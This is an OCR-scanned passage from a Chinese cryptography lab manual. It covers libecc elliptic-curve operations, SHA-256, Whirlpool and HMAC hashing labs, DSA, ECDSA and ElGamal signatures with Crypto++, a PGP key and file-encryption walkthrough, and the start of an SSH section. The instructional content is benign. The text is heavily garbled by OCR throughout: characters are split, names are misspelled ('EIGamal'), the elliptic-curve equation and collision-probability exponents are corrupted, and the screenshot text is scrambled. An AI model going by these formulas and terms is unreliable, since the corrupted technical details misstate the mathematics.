libecc 是 一 个 开放 源 代码 的 ECC 算法 开发 包 ， 它 提供 一 组 库 文件 供 开 发 者 使 用 ， 以 
实现 基于 椭圆 曲线 的 各 类 密码 学 应 用 ， 如 密 钥 交换 、 加 解密 、 数 字 签名 等 。 

【实验 环境 】 

安装 Linux 操作 系统 的 PC 一 台 ， 其 上 安装 gcc 编译 器 。 


【实验 步骤 】 
(1) 从 网 站 libecc.sourceforge.net 下 载 libecc 开发 包 的 最 新 版 本 libecc0.11.1.tar.gz。 
(2) 进入 保存 文件 的 目录 ， 执 行 以 下 操作 完成 libece 的 安装 。 


$ tar zxvf libecc 0.11.1.tar.gz // 解 压缩 文件 
$ cd libecc 0.11.1 // 进 入 解压 后 的 目录 
$ ./configure -prefix=/usr // 进 行 安装 配置 
$ make // 编 译文 件 
$ su // 切 换 到 root 用 户 ,需要 输入 密码 ,$ 变 成 # 
# make install // 安 装 编译 好 的 库 文件 


(3) 单 击 libecc.sourceforge.net 网 站 主页 上 的 Reference Manual 超 链接 ， 进 入 libecc 
的 内 容 介 绍 部 分 。 通 过 网 页 上 的 文字 介绍 以 及 阅读 相关 的 源 代码 ， 了 解 各 个 类 及 其 成 员 
函数 的 意义 与 调用 方法 。 在 后 面 的 实验 中 ，libece: :point 类 和 其 成 员 函 数 要 被 直接 调用 ， 
因此 在 这 里 做 一 下 重点 介绍 。 

libecc: :point< Polynomial, a, b > 类 表示 在 椭圆 曲线 x+ar? +p= 刀 +xzy 上 的 点 
Go, J)。 以 下 是 其 成 员 函 数 的 介绍 。 

e point (void) 创 建 一 个 在 无 穷 远 处 的 点 〈 零 点 ) 。 

® point (polynomial type const &x, polynomial type const &y) 创 建 一 个 与 多 项 式 变 
量 x、y 一 一 对 应 的 点 。 
point (std: :string x , std: ;string y) 创建 一 个 与 字符 串 x 和 y 一 一 对 应 的 点 。 这 里 
相当 于 把 字符 串 x、y 转换 成 了 多 项 式 变量 x'、y'。 
point & operator= (point const &p1)，“=” 操 作 ， 复 制 点 pl 到 被 操作 的 点 。 
point & operator+= (point const &p1)，“+=” 操 作 ， 被 操作 点 与 点 pl 进行 “加 ” 
运算 。 
void MULTIPLY and assign (point const &pnt, mpz _class const &scalar)， 点 pnt 与 
数 scalar 做 “ 乘 ” 运 算 ， 即 scalar 个 点 pnt 相 “ 加 ”， 结 果 存 入 点 pnt。 
bool operator== (point const &p1) const 判断 被 操作 数 是 否 与 点 pl 相等 。 
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bool operator!= (point const &p1) const 判断 被 操作 数 是 否 与 点 pl 不 相等 。 
bool check (void) const 检查 当前 点 是 否 在 椭圆 曲线 上 或 是 在 无 穷 远 处 。 
polynomial type const & get x (void) const 获取 该 点 的 x 坐标 。 
polynomial type const & get_y (void) const 获取 该 点 的 y 坐标 。 

bool is_zero (void) const 判断 该 点 是 否 是 无 穷 远 点 (零点 ) 。 

void print_on (std: :ostream &os) const 输出 该 点 坐标 。 

void randomize (rds &random_source) 生 成 一 个 椭圆 上 的 随机 点 。 


(4) 尝试 使 用 上 述 成 员 函 数 生成 几 个 点 ， 并 对 其 进行 简单 操作 。 


(5) 尝试 使 用 上 述 成 员 函 数 ， 结 合 相关 知识 ， 


(6) 尝试 使 用 上 述 成 员 函 数 ， 结 合 相 关 知 识 ， 实 现 基于 椭圆 曲线 的 EIGamal 加 解密 


算法 。 并 验证 解密 后 的 结果 是 否 就 是 加 密 前 的 值 。 


【实验 报告 】 

(1) 简 述 ECC 算法 相对 于 RSA 算法 的 优 缺 点 。 

(2) 简 述 基于 椭圆 曲线 的 Diffie-Hellman 密 钥 交换 流程 。 
(3) 简 述 基于 椭圆 曲线 的 EIGamal 加 解密 算法 流程 。 
(4) 列 出 安装 libecc 过 程 中 出 现 的 问题 以 及 解决 方法 。 
【思考 题 】 

(1) 分 别 实现 RSA 与 ECC 算法 ， 比 较 在 相同 的 安全 强度 下 两 者 运行 的 速度 。 
(2) 考虑 用 椭圆 曲线 如 何 实现 数字 签名 。 


46 


实现 基于 椭圆 曲线 的 Diffie-Hellman 


第 5 章 本 
杂凑 算法 


51 SHA-256 

【实验 目的 】 

掌握 目前 普遍 使 用 的 SHA 算法 的 基本 原理 ,了 解 其 主要 应 用 方法 。 
【原理 简介 】 


SHA (Secure Hash Algorithm) 算法 由 美国 NIST 开发 ， 作 为 数字 签名 标准 中 使 用 的 


Hash 算法 ， 并 在 1993 年 作为 联邦 信息 处 理 标 准 公布 。 在 1995 年 公布 了 其 改进 版 本 
SHA-1,2001 年 NIST 发 布 了 三 个 额外 的 SHA 变 体 ,这 三 个 函数 都 将 消息 对 应 到 更 长 的 消 
息 摘 要 ,以 它们 的 摘要 长 度 ( 以 位 计算 ) 加 在 原名 后 面 来 命名 : SHA-256，SHA-384 和 
SHA-512。SHA-256 将 不 定 长 的 输入 变换 为 256b 定 长 输出 ， 作 为 输入 数据 的 摘要 (又 称 
为 数据 指纹 )， 反 映 了 数据 的 特征 。 设 摘要 长 度 为 mw， 则 对 于 给 定 输入 数据 ， 找 到 另 一 不 
同 数据 但 具有 相同 摘要 的 概率 为 2", 根据 生日 攻击 的 原理 , 寻找 到 两 个 数据 具有 相同 摘 


要 的 概率 为 23. Hash 算法 被 广泛 用 于 数据 完整 性 保护 、 身 份 认证 和 数字 签名 当中 。 


关于 SHA-256 基本 原理 及 数学 基础 的 介绍 ， 请 参阅 相关 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC++ 6.0 及 以 上 编译 器 。 
【实验 步骤 】 


(1) 从 http://cryptopp.sourceforge.net/docs/ref521/sha_8cpp-source.html 网 页 上 得 到 算 


法 的 源 代 码 。 


值 过 


(2) 构造 一 个 长 度 为 1KB 左右 的 文本 文件 ， 以 SHA-256 算法 对 文件 计算 Hash 值 。 
(3) 在 上 述 文本 文件 中 修改 一 个 字母 或 汉字 , 再 次 计算 Hash 值 , 与 步骤 (2) 中 Hash 


行 比较 ， 看 看 有 多 少 比特 发 生 改变 。 

(4) 测试 SHA-256 算法 的 速度 。 

【实验 报告 】 

(1) 简 述 SHA 算法 流程 。 

(2) 写 出 步骤 (2) 和 步骤 (3) 中 的 文本 文件 和 Hash 值 。 
(3) 写 出 所 使 用 机 器 的 硬件 配置 以 及 SHA-256 的 测试 速度 。 


【思考 题 】 
考虑 Hash 算法 如 何 用 于 数据 完整 性 校 验 ， 与 常用 的 CRC 校 验方 法 有 何不 同 ? 


区 
on 

汪 
RN 


53 Whirlpool 


【实验 目的 】 
通过 本 实验 ,掌握 Whirlpool 算法 的 基本 原理 ,了 解 其 主要 应 用 方法 。 
【原理 简介 】 


2000 年 ，Vincent Rijmen 和 Paulo S.L.M.Barreto 设计 了 Whirlpool, 它 是 目前 NESSIE 
(New European Schemes for Signature, Integrity, and Encryption) 唯一 推荐 使 用 的 Hash 函 
数 , 同时 它 也 被 国际 标准 化 组 织 ISO 和 国际 电子 技术 协会 EC 采用 作为 ISO/IEC 10118-3 
国际 标准 。 

Whirlpool 是 在 分 组 密码 Square 的 基础 上 设计 的 ， 算 法 的 输入 长 度 不 超过 235%， 产 
生 512b 的 Hash 值 。 最 初 的 版 本 中 ，S 盒 是 随机 生成 的 ， 具 有 良好 的 密码 学 特性 ;2001 
年 的 版 本 中 ， 对 它 进行 了 改进 ， 使 其 密码 学 特性 更 好 ， 而 且 更 方便 硬件 实现 ; 2003 年 的 
版 本 中 ， 进 一 步 修改 了 扩散 阵列 〈Diffusion Matrix)。Whirlpool 是 个 很 新 的 算法 ， 实 现 
方面 经 验 很 少 ， 拥 有 与 AES 相似 的 性 能 和 空间 特性 ， 与 SHA-512 相 比 ，Whirlpool 需要 
更 多 硬件 资源 ， 但 性 能 更 好 。 

关于 Whirlpool 基本 原理 及 数学 基础 的 介绍 ， 请 参阅 相关 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC++ 6.0 及 以 上 编译 器 。 


【实验 步骤 】 

(1) 从 http://cryptopp.sourceforge.net/docs/ref521/whrlpool_8cpp-source.html 网 页 上 得 
到 算法 的 源 代码 。 

(2) 构造 一 个 长 度 为 1KB 左右 的 文本 文件 ， 以 Whirlpool 算法 对 文件 计算 Hash 值 。 

(3) 在 上 述 文本 文件 中 修改 一 个 字母 或 汉字 , 再 次 计算 Hash 值 , 与 步骤 (2) 中 Hash 
值 进 行 比较 ， 看 看 有 多 少 比特 发 生 改变 。 

(4) 测试 Whirlpool 算法 的 速度 。 

【实验 报告 】 

(1) 简 述 Whirlpool 算法 流程 。 

(2) 写 出 步骤 (2) 和 步骤 (3) 中 的 文本 文件 和 Hash 值 。 

(3) 写 出 所 使 用 机 器 的 硬件 配置 以 及 Whirlpool 的 测试 速度 。 

【思考 题 】 

思考 Whirlpool 与 本 章 前 面 介绍 的 Hash 算法 的 区 别 。 
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_53 _HMAC 
【实验 目的 】 


掌握 目前 普遍 使 用 的 HMAC 算法 的 基本 原理 ,了 解 其 主要 应 用 方法 。 

【原理 简介 】 

HMAC 是 密 钥 相关 的 哈 希 运算 消息 认证 码 (keyed-Hash Message Authentication 
Code)，HMAC 运算 利用 哈 希 算法 ， 以 一 个 密 钥 和 一 个 消息 为 输入 ， 生 成 一 个 消息 摘要 
作为 输出 。 

关于 HMAC 基本 原理 及 数学 基础 的 介绍 ， 请 参阅 相关 参考 书 。 

【实验 环境 】 

安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC++ 6.0 及 以 上 编译 器 。 

【实验 步骤 】 

(1) 从 http://cryptopp.sourceforge.net/docs/ref521/hmac_8cpp-source.html 网 页 上 得 到 
算法 的 源 代码 。 

(2) 构造 一 个 长 度 为 1KB 左右 的 文本 文件 ， 以 HMAC 算法 对 文件 计算 Hash 值 。 

(3) 在 上 述 文本 文件 中 修改 一 个 字母 或 汉字 , 再 次 计算 Hash 值 , 与 步骤 (2) 中 Hash 
值 进行 比较 ， 看 看 有 多 少 比 特 发 生 改 变 。 

(4) 测试 HMAC 算法 的 速度 。 

【实验 报告 】 

(1) 简 述 HMAC 算法 流程 。 

(2) 写 出 步骤 (2) 和 步骤 (3) 中 的 文本 文件 和 Hash 值 。 
(3) 写 出 所 使 用 机 器 的 硬件 配置 以 及 HMAC 的 测试 速度 。 
【思考 题 】 

思考 HMAC 与 本 章 前 面 介 绍 的 Hash 算法 的 区 别 。 


49 


第 6 音 
数字 签名 算法 


6.1 DSA 


【实验 目的 】 
了 解 DSA 数字 签名 算法 的 设计 原理 和 验证 方法 ,利用 crypto++ 密 码 库 函数 实现 DSA 
签名 和 验证 。 


【原理 简介 】 

1991 年 8 月 30 日 ,美国 国家 标准 与 技术 学 会 (NIST) 提出 了 一 个 联邦 数字 签名 标 
准 , NIST 称 为 DSS (Digital Signature Standard)。DSS 中 采用 的 算法 简 记 为 DSA (Digital 
Signature Algorithm)。NIST 提出 :“DSA 适用 于 联邦 政府 的 所 有 部 门 ， 以 保护 未 加 密 的 
信息 …… 它 同样 适用 于 E-mail、 电 子 金融 信息 传输 、 电 子 数据 交换 、 软 件 发 布 、 数 据 存 
储 及 其 他 需要 数据 完整 性 和 原始 真实 性 的 应 用 。”DSA 应 用 非常 广泛 ， 许 多 软件 厂商 都 
支持 该 签名 算法 。 

DSA 使 用 SHA-1 作为 被 签名 消息 的 摘要 算法 ， 其 签名 长 度 为 320b， 其 安全 性 基于 
计算 离散 对 数 的 困难 性 ， 是 EIGamal 签字 和 Schnorr 签字 的 一 种 变形 。DSA 只 能 用 于 数 
字 签 名 而 不 能 用 于 加 密 。 

有 关 DSA 的 原理 与 数学 基础 请 查阅 相应 的 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 有 VC++ 6.0 及 以 上 版 本 的 编译 器 。 
【实验 步骤 】 


(1) 从 http://cryptopp.sourceforge.net/docs/ref521/dsa_8cpp-source.html 网 页 上 得 到 算 
法 的 相关 源 代 码 ， 并 将 其 编译 为 一 个 可 执行 的 程序 。 

(2) 产生 DSA 密 钥 对 ， 选 择 一 个 文本 文件 以 私 钥 进 行 签名 ， 记 录 签 名 结果 。 

(3) 对 签名 用 公 钥 进行 验证 。 随 后 对 文本 文件 内 容 进行 修改 ,再 次 用 公 钥 验证 签名 ， 
记录 验证 的 结果 。 

(4) 测试 DSA 签名 和 验证 的 速度 。 

【实验 报告 】 

(1) 简 述 DSA 的 原理 。 

(2) 记录 产生 密 钥 对 ， 被 签名 文件 和 签名 。 

(3) 记录 使 用 机 器 的 硬件 配置 及 签名 和 验证 的 速度 〈 次 / 秒 )。 


【思考 题 】 
考虑 DSA 签名 算法 与 公 钥 加 密 算 法 的 不 同 之 处 ， 说 明 为 什么 DSA 不 能 用 于 加 密 。 


62 ECDSA 


【实验 目的 】 
通过 本 实验 了 解 ECDSA 数字 签名 算法 的 原理 和 验证 方法 ， 利 用 crypto++ 密 码 库 函 
数 实 现 ECDSA 方法 ， 并 了 解 其 与 DSA 算法 之 间 的 关系 。 


【原理 简介 】 

基于 椭圆 曲线 上 离散 对 数 计算 的 难题 (ECDLP)，1985 年 NKoblitz 和 Miller 提出 将 
椭圆 曲线 用 于 密码 算法 ， 分 别 利用 有 限 域 上 椭圆 曲线 的 点 构成 的 群 实 现 了 离散 对 数 密码 
算法 。6.1 节 的 DSA 算法 也 被 广泛 应 用 在 椭圆 曲线 上 ， 称 为 椭圆 曲线 数字 签名 算法 
ECDSA， 由 IEEE 工作 组 和 ANSI (American National Standard Institute) X9 组 织 开发 ， 
被 定 为 X9.62。 一 般 认为 ECDLP 比 一 般 有 限 域 上 离散 对 数 问 题 (DLP) 要 困难 得 多 ， 因 
此 椭圆 曲线 系统 中 每 个 密 钥 位 的 强度 在 本 质 上 要 比 传统 的 离散 对 数 系 统 大 得 多 ， 因 而 除 
了 具有 相同 等 级 的 安全 性 外 ，ECC 系统 所 用 的 参数 比 DL 系统 所 用 的 参数 少 。 该 系统 的 
优点 是 参数 少 、 速 度 快 以 及 密 钥 和 证 书 都 较 小 。 这 些 优点 在 处 理 能 力 、 存 储 空间 、 带 宽 
和 能 源 受 限 的 环境 中 尤其 重要 。 

有 关 ECDSA 的 原理 与 数学 基础 请 查阅 相应 的 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 有 VC++ 6.0 及 以 上 版 本 的 编译 器 。 


【实验 步骤 】 


关 源 代码 ， 并 将 其 编译 为 一 个 可 执行 的 程序 。 
(2) 产生 ECDSA 密 钥 对 ， 选 择 一 个 文本 文件 以 私 钥 进行 签名 ， 记 录 签 名 结果 。 
(3) 对 签名 用 公 钥 进行 验证 。 随 后 对 文本 文件 内 容 进行 修改 ,再 次 用 公 钥 验证 签名 ， 
记录 验证 的 结果 。 
(4) 测试 ECDSA 签名 和 验证 的 速度 ， 并 与 DSA 的 签名 和 验证 速度 进行 比较 。 
【实验 报告 】 
(1) 简 述 ECDSA 的 算法 流程 。 
(2) 记录 产生 密 钥 对 ， 被 签名 文件 和 签名 。 
(3) 记录 使 用 机 器 的 硬件 配置 及 签名 和 验证 的 速度 〈 次 / 秒 )。 


【思考 题 】 
比较 ECDSA 和 DSA 的 优 缺 点 ， 并 利用 4.2 节 的 libecc 库 重 新 编写 ECDSA 。 
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6.3 ElGamal 


【实验 目的 】 
了 解 EIGamal 数字 签名 算法 的 设计 原理 和 验证 方法 ， 利 用 crypto++ 密 码 库 函 数 实现 


ElGamal 签名 和 验证 。 


【原理 简介 】 
ElGamal 签名 体制 由 T.EIGamal 在 1985 年 提出 。 其 修正 形式 已 被 美国 NIST 作为 数 


字 签 名 标准 (DSS)。 它 是 Rabin 体制 的 一 种 变形 ， 专 门 设计 作为 签名 用 。 方 案 的 安全 性 
基于 求 离散 对 数 的 困难 性 。 它 是 一 种 非 确定 性 的 双 钥 体制 ， 即 对 同一 明文 消息 ， 由 于 随 
机 参数 选择 不 同 而 有 不 同 的 签名 。 目 前 ，ANSI X9.30-199X 已 将 EIGamal 签名 体制 作为 
签名 标准 算法 。 


有 关 ElGamal 的 原理 与 数学 基础 请 查阅 相应 的 参考 书 。 
【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 有 VC++ 6.0 及 以 上 版 本 的 编译 器 。 


【实验 步骤 】 
(1) 从 http://cryptopp.sourceforge.net/docs/ref521/elgamal_8cpp-source.html 得 到 算法 


的 相关 源 代 码 ， 并 将 其 编译 为 一 个 可 执行 的 程序 。 


(2) 产生 EIGamal 密 钥 对 ， 选 择 一 个 文本 文件 以 私 钥 进行 签名 ， 记 录 签 名 结果 。 
(3) 对 签名 用 公 钥 进行 验证 。 随 后 对 文本 文件 内 容 进 行 修改 ,再 次 用 公 钥 验证 签名 ， 


记录 验证 的 结果 。 


(4) 测试 EIGamal 签名 和 验证 的 速度 ， 并 与 DSA 的 签名 和 验证 速度 进行 比较 。 


【实验 报告 】 

(1) 简 述 EIGamal 的 算法 流程 。 

(2) 记录 产生 密 钥 对 ， 被 签名 文件 和 签名 。 

(3) 记录 使 用 机 器 的 硬件 配置 及 签名 和 验证 的 速度 次 / 秒 )。 

【思考 题 】 

比较 签名 算法 DSA 与 EGamal 签名 体制 的 异同 ， 并 指出 ElGamal 签名 具有 哪些 
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第 也 
常用 密码 软件 的 工具 应 用 


7.1 PGP 


【实验 目的 】 

掌握 目前 十 分 流行 的 加 密 软件 PGP 的 使 用 ， 并 加 深 理解 密码 学 在 网 络 安全 中 的 重 
要 性 。 

【原理 简介 】 

1. PGP 简介 

PGP (Pretty Good Privacy)， 是 一 个 基于 RSA 公 钥 加 密 体系 的 加 密 软件 。 它 可 以 用 
来 加 密 文件 ， 可 以 用 来 对 邮件 保密 以 防止 非 授权 者 阅读 ， 还 能 对 邮件 加 上 数字 签名 从 而 
使 收 信 人 可 以 确认 邮件 的 发 送 者 ， 并 能 确信 邮件 没有 被 算 改 。 同 时 ， 它 提供 一 种 安全 的 
通信 方式 , 而 事先 并 不 需要 任何 保密 的 渠道 来 传递 密 钥 。 它 采用 了 一 种 RSA 和 传统 加 密 
的 杂 合 算法 ， 用 于 数字 签名 的 邮件 文摘 算法 、 加 密 前 压缩 等 ， 还 有 一 个 良好 的 人 机 工程 
设计 。 它 的 功能 强大 ， 有 很 快 的 速度 。 而 且 它 的 源 代 码 是 免费 的 。 

2. PGP 中 的 密码 算法 

PGP 应 用 了 一 个 混合 加 密 算法 ， 它 包含 对 称 密 钥 算 法 、 非 对 称 密 钥 算 法 、 消 息 报 
文摘 要 等 经 典 的 密码 学 算法 ， 同 时 还 涉及 数字 签名 的 思想 。 它 为 用 户 生 成 密 钥 对 之 后 ， 
可 以 进行 邮件 的 加 密 、 签 名 、 解 密 和 认证 。 在 PGP 中 使 用 的 加 密 算法 和 用 途 如 表 7-1 
所 示 。 


表 7-1 PGP 中 所 采用 的 各 种 密码 算法 
加 密 算 法 用 途 
IDEA, AES 对 传送 消息 的 加 解密 ， 随 机 生成 ， 一 次 性 使 用 
RSA, Diffie-Hellman 对 会 话 密 钥 加 密 ， 收 信人 和 发 信人 共用 
RSA, Diffie-Hellman 对 消息 的 杂凑 值 加 密 以 形成 签字 ， 发 信人 专用 
对 私 钥 加 密 以 存储 于 发 送 端 


【实验 环境 】 
Windows XP 系统 ，PGP 8.0 以 上 版 本 (最 新 版 本 是 10.0.3)。 


【实验 步骤 】 

1. 用 PGPkeys 管理 密 钥 环 

(1) 用 户 密 钥 环 的 生成 

Q@ 打开 【开始 】| 程 序 |PGPIPGPkeys， 启 动 PGPkeys， 界 面 如 图 7-1 所 示 。 


了 PCPkeys 回回 轩 
Eile Edit View Keys Server Groups lelp 
5 对 罗 基 | 依 叶 号 多 | 户 加 


图 7-1 PGP 启动 界面 


@ 在 PGP Key Generation Wizard 提示 下 ， 单 击 【 下 一 步 】 按 钮 ， 开 始 创建 密 钥 对 ， 
如 图 7-2 所 示 。 
PGP Key Generation Wizard 
Welcome to the PGP Key 
Generation Wizard 
In order for other people to send you secure messages. 
vou must frst generate a key psi 

》 Your key pai wil also be used to sign digital documents. 

A key pai consists of a "Public Key," and a "Pivate 


Key.” The public key should be gven to everyone you 
(PGP has faciities to assistin this}. The Private key 
be kept absolulely secret. 


know 
should 


If you would ike more information on what a key pair is 
and how PGP works, choose the PGPkeys Help menu. 


Dtherwise, choose Next to continue. Expert users can 
click Expert below to have more detailed control 


区 宇文] 
图 7-2 PGP 密 钥 生 成 界面 


@ 输入 名 字 和 邮件 地 址 〈 为 了 用 户 之 间 便 于 辨认 ， 尽 量 使 用 真名 或 别人 熟悉 的 昵 
称 )， 如 图 7-3 所 示 。 

@ 选择 适当 的 加 密 算法 和 密 钥 长 度 、 证 书 年 限 等 设置 。 

@ 输入 用 户口 令 至 足够 长 (至 少 大 于 8 个 字符 )， 可 以 选择 隐 式 输入 确保 口令 安全 ， 
如 图 7-4 所 示 。 

@ 单 击 【完成 】 按 钮 ， 如 图 7-5 所 示 。 
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PGP Key Generation Wizard 


Name and Email Assignment 
Every key pai must have a name associated withit The name and email address let 
your comespondents know that the public key they are using belongs to you 


Eul name: yuanyan 


By associating an email address with your key pai you wil enable PGP to assist your 
conespondents in communicating with you 


selecting the corect public key when 


Emaladdess |yuanyanB163. com 


图 7-3 密 钥 生成 帮助 界面 


PG6P Key Generation Wizard 


Passphrase Assignment 
Your private key will be protected by a passphrase tis important that you keep this 
passphrase secret and do not write t down. 


Your passphtase should be at least 8 characters long and should contain 
nomalphabetic characters. 


Hide Typing 


Completing the PGP Key 
Generation Wizard 


You have successfuly generated a PGP key pai 


You wil now be able to receive secure messages and 
sign documents 


lf you wish to send your new public key to a keyserver 
rp and use the “Send to" 
menu 


Cick Finish to close this Wizard and add your new key 
Pa to your keyring. 


图 7-5 完成 界面 
@) 至 此 完成 ， 可 看 到 生成 的 密 钥 出 现在 了 Keys 里 ， 如 图 7-6 所 示 。 
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汶 
Wa 
be 

Re 


¥ PGPkeys 
File Edit Viex Keys Server Groups lelp 


机 史 四 | 只 到 区 到 | 巴 园 


yaanyan <yuanyan@l63. com> 
日 回 yuanyan 《yuanyan8163. con> 
愉 yaanyan Gaanyan8163 com> 


图 7-6 已 经 生成 的 密 钥 
(2) 用 户 公 钥 的 交换 
@ 右 击 选择 导出 公 钥 的 用 户 名 ， 选 择 Export 即 可 导出 公 钥 ， 也 可 选择 Keys|Export 
导出 ， 如 图 7-7 所 示 。 


k 口 
File Edit Yiew Server Groups lelp 
现 号 区 司 | iio Ctrlts 
Set as Default Key CtrltD 
dd » Bust Size Description 
9 哆 Enable 
日 回 ynye Dis。 Vser ID 
yan oe DSS exportable 
evoke. 


Reverify Signatures 


New Key. CtrltH 

Share Split. 

Tnport. Car 
co | 国 
1 Selected Properties. CtrltI 图 


图 7-7 导出 公 钥 
@ 读者 也 可 用 类 似 的 方式 ， 将 公 钥 发 送 给 邮件 接收 者 图 略 )。 
@ 导入 公 钥 可 用 如 下 方式 : 双击 打开 所 选 的 公 钥 ， 单 击 Import， 如 图 7-8 所 示 。 或 
是 通过 KeyslImport 导入 。 


了 Select key(s) [aE 


Select the keyfsjyou would ke to import to your keying: 


图 7-8 导入 公 钥 
@ 请 读者 自己 打开 生成 的 密 钥 环 和 导入 的 公 钥 看 看 它们 有 什么 区 别 。 
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2. 使 用 PGP 对 文件 进行 操作 
为 了 本 实验 能 够 顺利 模拟 ,我 们 在 一 台 主 机 上 需要 建立 两 个 Keys。 建 立方 法 是 ， 首 
先生 成 一 个 用 户 密 钥 环 作为 文件 的 接收 方 和 认证 方 ( 记 作用 户 A), 记 住 他 的 用 户口 令 并 
导出 公 钥 ， 然 后 将 这 个 公 钥 私 钥 文件 对 储存 在 单独 的 文件 夹 里 。 

删除 这 个 用 户 密 钥 环 ， 新 建 一 个 用 户 作 为 文件 的 提供 方 和 认证 及 签字 方 《 记 作用 户 
B)， 其 他 操作 同上 。 

(1) 利用 PGP 加 密 文件 


@ 打开 Keys， 单 击 FilelOpen， 将 用 户 B 文件 夹 里 的 密 钥 环 导出 ， 加 入 Keys 中 ， 
并 将 刚才 导出 的 用 户 A 的 公 钥 导入 ， 如 图 7-9 所 示 。 


? PGPkeys 辕 回 因 


Eile Edit View Keys Server Groups kelp 

入 叶 罗 名 人 守信 | 户 因 

Ve | Trust | Sire Description 
人 CH 2048/1024 DWDSS public y| 


We linlin Qinlin8163 coay 


田 具 yuanyan Cyuanyang163.con》 国 、EEEEE 2048/1024 DM/DSS key pais 


图 7-9 导入 用 户 A 的 公 钥 
@ 打开 PGP 中 的 另 一 个 程序 ，PGPmail， 界 面 如 图 7-10 所 示 。 
图 单 击 第 二 项 对 某 文件 进行 加 密 。 
这 时 ， 它 会 自动 把 默认 用 户 环 作为 加 密 用 的 公有 ee 四 已 图 


钥 ， 如 图 7-11 所 示 。 而 这 里 模拟 的 是 利用 其 他 用 户 “| 别 | 名 | 车 | 呈 | 芝 | 语 


的 公 钥 加 密 , 故 将 用 户 A 的 公 钥 设 作 加 密 用 。 下 面 还 


图 7-10 PGPmail 界面 
、 了 yp > 光田 站 、 
可 以 选 一 定 的 文件 存储 方式 ， 这 里 选择 默认 。 

Drag users from this list to the Recipients list | Yal... Size | 
[Ejlinlin dinling163. com> Cp] 2048/1024 
Recipients [Vl size | 

EI yuanyan Guanyanal63 con> 2048/1024 
Bie ow | 
DD Imput Is Text 
Drive orizinal 
Dsecure Yiewer 
Dconwentional Eneryption 

Dsalf Decrvptinz Archive 
图 7-11 密 钥 选择 


可 以 看 到 ， 加 密 后 的 文件 保存 如 图 7-12 所 示 。 
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图 这 时 可 以 尝试 解密 该 文件 ， 因 为 在 Keys 中 并 没有 用 户 A 的 私 钥 ， 故 无 法 解密 ， 
弹出 如 图 7-13 所 示 的 提示 框 。 


Message was encrypted to the following public keyls} : 
yuanyan 人 uanyanB163. com> (DH/2048) 


Itis not possble to because your keying does 
= A contan usable De ee ns a 
目 风 

网 络 安全 实 网 络 安全 实 Cancel 

验 .txt 验 . txt_pap 


图 7-12 文件 被 加 密 后 的 图 标 图 7-13 文件 无 法 解密 提示 

@ 这 时 将 Keys 中 的 所 有 项 删除 , 将 用 户 A 里 的 密 钥 环 导入 , 运行 PGPmail 选择 解 
密 刚 才 加 密 过 的 文件 。 这 时 弹出 对 话 框 要 求 输入 用 户口 令 ， 如 图 7-14 所 示 。 

尝试 使 用 错 的 口令 ， 则 窗口 会 提示 ， 如 图 7-15 所 示 。 


Message was enctypled to the folowing public key(s]; Message was enctypled to the folowing public keyls) 
yuanyan 《yuanyanB163. com> (DH/2048) yuanyan CyuanyanB163. com> (DH/2048) 


Enter passphrase for your private key i (ORe-enter passphrase of your private key 


Ca ] [gene ] 
图 7-14 对 加 密 的 文件 进行 解密 图 7-15 输入 口令 错误 提示 


直至 输入 正确 口令 ， 解 密 过 程 可 以 正常 进行 。 请 读者 对 比 一 下 ， 解 密 之 后 的 文件 是 
否 与 原文 件 完 全 一 样 呢 ? 

(2) 利用 PGP 数字 签名 

@ 还 是 使 用 用 户 A 的 用 户 环 ， 打 开 PGPmail， 选 择 第 三 项 ， 进 行 数字 签名 ， 找 到 
需要 进行 数字 签名 的 文件 。 这 时 要 求 输入 口令 ， 如 图 7-16 所 示 。 

@ 输入 合适 的 口令 ， 就 可 以 得 到 签名 后 的 文件 ， 如 图 7-17 所 示 。 


il - Enter Passphrase 


Signing Key | anyan Cyuanyana183. com> 0ss/1l024) 
Enter passphtase for above key: 回 Hide Typing 


Je 


[Ce] Le ] 


因 
Detached Signature 日 
口 Text Output 了 
DInput Is Text 


2 


图 7-16 要 求 输入 口令 提示 图 7-17 签名 后 的 文件 图 标 
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@ 这 时 打开 该 文件 ， 会 得 到 如 图 7-18 所 示 的 签名 者 信息 。 


yuanyan 人 uanyan8163. con> 0x08B2F066 三 2011-7-25 14:23:00 


图 7-18 签名 者 信息 显示 


只 要 有 用 户 A 的 公 钥 ， 就 可 以 得 到 这 样 的 数字 签名 信息 。 

@ 加 密 和 签名 的 混合 使 用 。 

因为 过 程 与 前 面 类 似 ， 建 议 读 者 自己 完成 。 

(3) 使 用 PGP 加 密 邮 件 

PGP 可 以 直接 嵌入 邮件 客户 端 Outlook 中 使 用 ， 在 发 送 之 前 ， 选 中 邮件 所 有 内 容 ， 
右 击 任务 栏 中 的 PGP encryption 图 标 即 可 完成 邮件 加 密 。 收 到 邮件 双击 打开 后 ， 单 击 
Decrypt PGP Message 图 标 ， 就 可 解密 邮件 。 因 为 实验 过 程 较为 简单 ， 请 读者 自行 完成 。 


【实验 报告 】 

(1) 简 述 PGP 加 解密 文件 的 步骤 。 

(2) 简 述 PGP 的 应 用 。 

(3) 将 实验 过 程 中 重要 的 步骤 截图 并 保存 。 

【思考 题 】 

密 钥 交换 对 安全 性 有 何 影 响 ? 如 何 保证 PGP 生成 的 密 钥 能 够 安全 地 发 布 与 交换 ? 


Wl SSH 


【实验 目的 】 
通过 本 实验 ， 学 习 SSH 的 基本 概念 和 认证 技术 ， 掌 握 常 用 的 SSH 软件 操作 方法 。 


【原理 简介 】 

安全 过 (Secure Shell，SSH) 是 一 种 通用 的 、 功 能 强大 的 、 基 于 软件 的 网 络 安全 性 
解决 方案 。 计 算 机 每 次 向 网 络 发 送 数据 时 ，SSH 都 会 自动 对 其 进行 加 密 。 当 数据 到 达 目 
的 地 时 ，SSH 自动 对 数据 进行 解密 。 整 个 加 密 过 程 都 是 透明 的 ， 用 户 可 以 正常 工作 ， 根 
本 察觉 不 到 他 们 的 通信 在 网 络 上 是 经 过 加 密 的 。 另外, SSH 使 用 了 常用 的 安全 加 密 算 法 ， 
足以 胜任 大 型 公司 繁重 任务 的 要 求 。 

